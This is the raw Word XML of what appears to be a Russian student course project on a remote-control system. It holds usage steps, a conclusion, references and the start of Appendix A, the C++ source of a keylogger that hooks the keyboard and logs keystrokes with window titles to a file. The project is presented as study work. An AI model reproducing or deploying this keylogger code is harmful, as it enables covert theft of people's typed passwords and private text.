          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>long</w:t>
      </w:r>
      <w:r w:rsidRPr="00514D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lling</w:t>
      </w:r>
      <w:r w:rsidRPr="00514D82">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и потребует выслать данные, не дожидаясь истечения таймера. При наличии новых данных они отобразятся на экране.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C77BF29" w14:textId="473987B5" w:rsidR="00514D82" w:rsidRDefault="00514D82" w:rsidP="00514D82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Третья кнопка отвечает за удаления данных выбранного устройства с сервера. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05181023" w14:textId="072FB8FA" w:rsidR="00C2430F" w:rsidRDefault="00C2430F" w:rsidP="00514D82">
      <w:pPr>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="760AB8D6" w14:textId="464A2B2D" w:rsidR="00514D82" w:rsidRPr="00331269" w:rsidRDefault="00C2430F" w:rsidP="00331269"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331269">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">запуска самого кейлоггера на устройстве можно или самостоятельно запустить его исполняемый файл вместе с исполняемым файлом </w:t>
      </w:r>
      <w:r w:rsidR="00631A74">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>клиента для</w:t>
      </w:r>
      <w:r w:rsidR="00331269" w:rsidRPr="00331269">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> передачи данных </w:t>
      </w:r>
      <w:r w:rsidR="00331269">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">или запустить </w:t>
      </w:r>
      <w:r w:rsidR="00331269">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bat</w:t>
      </w:r>
      <w:r w:rsidR="00331269" w:rsidRPr="00331269">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00331269">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>файл, который сам запустит их.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FF4C87" w14:textId="77777777" w:rsidR="00331269" w:rsidRDefault="00331269" w:rsidP="00331269">
      <w:pPr>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C3F3BEC" w14:textId="40008EF0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EC517" wp14:editId="23798CE9">
            <wp:extent cx="5715000" cy="3514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071" cy="3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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>исунок 6.</w:t>
      </w:r>
      <w:r w:rsidRPr="00331269">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Запуск вручную</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E5060A" w14:textId="77777777" w:rsidR="00331269" w:rsidRDefault="00331269" w:rsidP="00514D82">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="565380FE" w14:textId="754A9C21" w:rsidR="006D7283" w:rsidRDefault="00331269" w:rsidP="00331269">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:spacing w:after="0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1C7BF42E" wp14:editId="5A5349D3">
            <wp:extent cx="5552381" cy="8380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269">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Рисунок 6.</w:t>
      </w:r>
      <w:r w:rsidRPr="00331269">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Запуск </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00331269">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">помощью </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bat</w:t>
      </w:r>
      <w:r w:rsidRPr="00331269">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>файла</w:t>
      </w:r>
      <w:r w:rsidR="006D7283">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8880AA" w14:textId="77777777" w:rsidR="001E6BF1" w:rsidRPr="00174652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lastRenderedPageBreak/>
        <w:t>ЗАКЛЮЧЕНИЕ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBCE54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9B6A11E" w14:textId="7656BC65" w:rsidR="00695203" w:rsidRP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 xml:space="preserve">В результате выполнения курсового проекта была достигнута основная цель </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w: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о программное средство, реализующее механизм распределённого удалённого управления. В ходе работы были последовательно выполнены все этапы жизненного цикла программного обеспечения: от анализа требований и проектирования архитектуры до реализации, тестирования и анализа результатов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4806C27D" w14:textId="36B96B6B" w:rsidR="00695203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Проект позволил закрепить знания в области сетевого взаимодействия, асинхронной обработки данных, клиент-серверной архитектуры и создания пользовательского интерфейса. Кроме того, была получена практическая компетенция в работе с современными средствами и инструментами разработки, включая технологии взаимодействия между клиентом и сервером, а также методы обеспечения устойчивой связи в распределённых системах.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025ABABF" w14:textId="4CE39C24" w:rsidR="008C32A0" w:rsidRPr="00695203" w:rsidRDefault="008C32A0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 w:rsidRPr="008C32A0">
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT-Regular" w:hAnsi="TimesNewRomanPSMT-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Также важным аспектом проекта стало углубление знаний в области компьютерной безопасности. Разработка кейлоггера и системы удалённого управления потребовала понимания принципов защиты информации, методов скрытого сбора и передачи данных, а также потенциальных угроз, связанных с использованием подобных инструментов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0FD561" w14:textId="6C0DF4C0" w:rsidR="001E6BF1" w:rsidRDefault="00695203" w:rsidP="0069520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 w:rsidRPr="00695203">
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT-Regular" w:hAnsi="TimesNewRomanPSMT-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Разработанное решение подтвердило свою работоспособность и соответствие заданным требованиям, что свидетельствует о корректности выбранного подхода и реализации. Полученные в ходе работы навыки могут быть применены в будущей профессиональной деятельности, связанной с разработкой распределённых и интерактивных программных систем.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5679AF9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553483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07586D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FD828A3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29BC34B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C9FD20F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4A8409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7B8070A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9F2E632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675E4A7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3D1C85D" w14:textId="77777777" w:rsidR="00222893" w:rsidRDefault="00222893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2006EA1" w14:textId="77777777" w:rsidR="001E6BF1" w:rsidRPr="00174652" w:rsidRDefault="002C0B7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55A0DDF8" w14:textId="77777777" w:rsidR="001E6BF1" w:rsidRDefault="001E6BF1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4FA4471" w14:textId="4A8D76DF" w:rsidR="00AC5887" w:rsidRDefault="000B31FA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CA7FAD">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009A700E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[1</w:t>
      </w:r>
      <w:r w:rsidR="009A700E" w:rsidRPr="000B31FA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="009A700E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>Node.js Documentation [Электронный ресурс]. – Режим доступа: https://nodejs.org/en/docs/ – Дата доступа: 2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3</w:t>
      </w:r>
      <w:r w:rsidR="00AC5887" w:rsidRPr="00AC5887">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.2025</w:t>
      </w:r>
      <w:r w:rsidR="00AC5887" w:rsidRPr="00AC5887">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE7EB9D" w14:textId="59DF71BC" w:rsidR="00577D9A" w:rsidRDefault="009A700E" w:rsidP="00AC5887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  <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[2</w:t>
      </w:r>
      <w:r w:rsidR="000B31FA" w:rsidRPr="000B31FA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00FB4F96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C++ Reference – cppreference.com [Электронный ресурс]. – Режим доступа: https://en.cppreference.com/ – Дата доступа: </w:t>
      </w:r>
      <w:r w:rsidR="00AC5887">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00AC5887" w:rsidRPr="00AC5887">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6.0</w:t>
      </w:r>
      <w:r w:rsidR="00AC5887">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00AC5887" w:rsidRPr="00AC5887">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.2025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B46CB91" w14:textId="22697BA9" w:rsidR="00577D9A" w:rsidRPr="009A700E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CA7FAD">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[3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577D9A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">SPA, Single Page Application, Одностраничное приложение </w:t>
      </w:r>
      <w:r w:rsidRPr="000B31FA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[Электронный ресурс]</w:t>
      </w:r>
      <w:r w:rsidRPr="0011628E">
        <w:rPr>
          <w:rStyle w:val="af7"/>
          <w:b w:val="0"/>
          <w:iCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0011628E">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000B31FA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>– Электронные данные. – Режим доступа:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D421B4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00577D9A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="00577D9A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:r w:rsidRPr="00577D9A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>weblab</w:t>
      </w:r>
      <w:r w:rsidRPr="00577D9A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00577D9A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ua</w:t>
      </w:r>
      <w:r w:rsidRPr="00577D9A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00577D9A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>spa</w:t>
      </w:r>
      <w:r w:rsidRPr="00577D9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F41BE">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Дата</w:t>
      </w:r>
      <w:r w:rsidRPr="009A700E">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF41BE">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>доступа</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>: 23.0</w:t>
      </w:r>
      <w:r w:rsidR="00AC5887">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AC5887">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FC31E0" w14:textId="677F868D" w:rsidR="00577D9A" w:rsidRPr="00AC5887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4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Express</w:t>
      </w:r>
      <w:r w:rsidR="00AC5887" w:rsidRPr="00AC5887">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AC5887" w:rsidRPr="00AC5887">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:r w:rsidR="00AC5887" w:rsidRPr="00AC5887">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00AC5887" w:rsidRPr="00AC5887">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Fast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unopinionated</w:t>
      </w:r>
      <w:r w:rsidR="00AC5887" w:rsidRPr="00AC5887">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00AC5887" w:rsidRPr="00AC5887">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>minimalist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web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ramework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for</w:t>
      </w:r>
      <w:r w:rsidR="00AC5887" w:rsidRPr="00AC5887"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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Node</w:t>
      </w:r>
      <w:r w:rsidR="00AC5887" w:rsidRPr="00AC5887">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AC5887" w:rsidRPr="00AC5887">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:r w:rsidR="00AC5887" w:rsidRPr="00AC5887">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Электронный ресурс]. – Режим доступа: </w:t>
      </w:r>
      <w:r w:rsidR="00AC5887" w:rsidRPr="00AC5887">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidR="00AC5887" w:rsidRPr="00AC5887">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:r w:rsidR="00AC5887" w:rsidRPr="00AC5887">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>expressjs</w:t>
      </w:r>
      <w:r w:rsidR="00AC5887" w:rsidRPr="00AC5887">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AC5887" w:rsidRPr="00AC5887">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>com</w:t>
      </w:r>
      <w:r w:rsidR="00AC5887" w:rsidRPr="00AC5887">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">/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</w:t>
      </w:r>
      <w:r w:rsidR="00AC5887">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00AC5887" w:rsidRPr="00AC5887">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.2025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37121AB1" w14:textId="2BD39743" w:rsidR="00577D9A" w:rsidRPr="005934A0" w:rsidRDefault="00577D9A" w:rsidP="00577D9A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5</w:t>
      </w:r>
      <w:r w:rsidRPr="000B31F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AC5887" w:rsidRPr="00AC5887">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Long Polling vs WebSockets: When to Use Each [Электронный ресурс]. – Режим доступа: https://ably.com/blog/long-polling – Дата доступа: </w:t>
      </w:r>
      <w:r w:rsidR="00AC5887">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="00AC5887" w:rsidRPr="00AC5887">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.05.2025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C96DA9B" w14:textId="77777777" w:rsidR="00E4237F" w:rsidRPr="005934A0" w:rsidRDefault="00E4237F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 w14:paraId="524D5223" w14:textId="77777777" w:rsidR="00296DF7" w:rsidRPr="00577D9A" w:rsidRDefault="00D82DE9" w:rsidP="005934A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5934A0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B54DCC8" w14:textId="77777777" w:rsidR="00A501F0" w:rsidRPr="00296DF7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 w:rsidRPr="00296DF7">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A6DD38" w14:textId="77777777" w:rsidR="001E6BF1" w:rsidRPr="00AA6BA0" w:rsidRDefault="008B4C09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lastRenderedPageBreak/>
        <w:t>ПРИЛОЖЕНИЕ</w:t>
      </w:r>
      <w:r w:rsidR="00A501F0" w:rsidRPr="00AA6BA0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A501F0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>А</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79816ADB" w14:textId="38717F82" w:rsidR="0054275D" w:rsidRPr="00AA6BA0" w:rsidRDefault="004D78D5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SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Исходный</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA6BA0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>код</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA6BA0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000875E6">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>кейлоггера</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74ED58A1" w14:textId="77777777" w:rsidR="00D26588" w:rsidRPr="00AA6BA0" w:rsidRDefault="00D2658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SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FC7D9A0" w14:textId="7A86A458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>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00631A74">
        <w:rPr>
          <w:sz w:val="14"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>include &lt;Windows.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F4BF3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time.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385896F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iostream&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A56B5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#include &lt;fstream&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A138C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using namespace std;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B077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97764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int Save(int key);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246626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DD8C0B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stdcall HookCallback(int nCode, WPARAM wParam, LPARAM lParam);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6573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21106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HHOOK hook;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123D07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A4D4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KBDLLHOOKSTRUCT kbStruct;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D0D31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3FDD9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ofstream file;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142402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9432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B1105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//extern char prevProg[256];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571982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B955B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int Save(int key){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491A2B2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0BF5DF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static char prevProg[256] = {0};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729A0EA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B320A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(key == 1 || key == 2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CB4E8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return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3790C8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85631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DA378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WND foreground = GetForegroundWindow();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734F4E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47236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DWORD threadId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAFBD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CF5D8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HKL keyboatdLayout;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6E234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24CD36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(foreground){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28570AA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threadId = GetWindowThreadProcessId(foreground, NULL);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3FB82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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D87843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keyboatdLayout = GetKeyboardLayout(threadId);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E7C44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06124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char crrProg[256];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C0D92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GetWindowTextA(foreground, crrProg, sizeof(crrProg));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665855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5C414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f(strcmp(prevProg, crrProg) != 0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E456D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trcpy_s(prevProg, crrProg);     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389767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2361050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time_t t = time(NULL);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C09A9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9B52E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truct tm * tm = localtime(&amp;t);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BB8EC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46096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c[64];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186B0C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DDCD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trftime(c, sizeof(c), "%c", tm);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D54C4B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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380B633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len = MultiByteToWideChar(CP_ACP, 0, crrProg, -1, NULL, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EB15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wchar_t* wstr = new wchar_t[len];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009F9A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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06029AA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MultiByteToWideChar(CP_ACP, 0, crrProg, -1, wstr, len);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF35C3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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F24CE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utf8_len = WideCharToMultiByte(CP_UTF8, 0, wstr, -1, NULL, 0, NULL, NULL);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1216BB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* utf8_str = new char[utf8_len];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2CC59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WideCharToMultiByte(CP_UTF8, 0, wstr, -1, utf8_str, utf8_len, NULL, NULL);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A5337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1B368B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file &lt;&lt; "\n\n\n[Program: " &lt;&lt; utf8_str &lt;&lt; " Date" &lt;&lt; c &lt;&lt; "]";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC594A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8E3B9A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delete[] wstr;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2355C66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delete[] utf8_str;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA876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5D59D6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7F04610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660AC62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66159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cout &lt;&lt; key &lt;&lt; endl;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA8FEB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1402A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(key == VK_BACK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059E60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BACKSPACE]";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F7667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RETURN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59239F9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n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46ADC64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SPACE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139BB57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 ";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578E11E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TAB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00521CD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TAB]";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692A48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SHIFT || key == VK_LSHIFT || key == VK_RSHIFT)</w:t>
      </w:r>
    </w:p>
